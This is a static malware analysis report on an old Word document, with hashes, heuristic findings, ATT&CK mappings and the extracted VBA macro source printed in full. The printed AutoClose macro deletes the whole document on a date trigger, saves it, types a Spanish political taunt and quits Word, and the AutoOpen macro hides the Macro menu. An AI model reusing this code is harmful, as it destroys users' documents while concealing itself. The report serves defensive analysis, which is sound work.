Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c097bec58ef9add0…

MALICIOUS

Office (OLE)

Size: 43.0 KB
Created: 2000-11-21 19:32:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: c9cf4d6054349ae42681416219de1d8b
SHA-1: 3db8a692a6d4a3dce90c5697586e5d06d437d70c
SHA-256: c097bec58ef9add0959ec77504bd194fc444f3a5b2ed1c17b0d09e1407709872
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros that run on the AutoOpen and AutoClose events. The AutoClose macro contains text that appears to be a political statement and may serve as a lure or distraction, but the presence of AutoOpen and AutoClose macros indicates an attempt to execute code when the document is opened or closed. The macros do not appear to download further payloads; they modify the document content in a non-standard way.

Heuristics 4

  • VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1847 bytes
SHA-256: 251d3d2b931277101080706d41a5b1e4a98a56890a4fb61c50c6ba504542dd17
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "AutoOpen"
Public Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Abre un documento de Microsoft Word"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.AutoOpen"
'
' AutoOpen Macro
' Opens a Microsoft Word document
'
CommandBars("Tools").Controls("Macro").Visible = False

End Sub

Attribute VB_Name = "AutoClose"
Public Sub AutoClose()
Attribute AutoClose.VB_Description = "Cierra el documento activo de Microsoft Word"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.AutoClose"
'
' AutoClose Macro
' Closes the active Microsoft Word document
'

If WordBasic.Day(WordBasic.Now()) > 1 And WordBasic.Month(WordBasic.Now()) > 11 Then

    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    ActiveDocument.Save
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.Font.ColorIndex = wdRed
    Selection.Font.Name = "Arial"
    Selection.Font.Name = "Arial"
    Selection.Font.Size = 36
    Selection.TypeText Text:="VICENTE FOX!!!!"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.Font.ColorIndex = wdBlack
    Selection.Font.Size = 24
    Selection.TypeText Text:="Ahora si ya te cargo la chingada!!!"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.TypeText Text:="Si al IVA en Alimentos y Medicinas!!!"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.TypeText Text:="ja,ja,ja,ja,ja,ja..."
    ActiveDocument.Save
    Application.Quit
End If
End Sub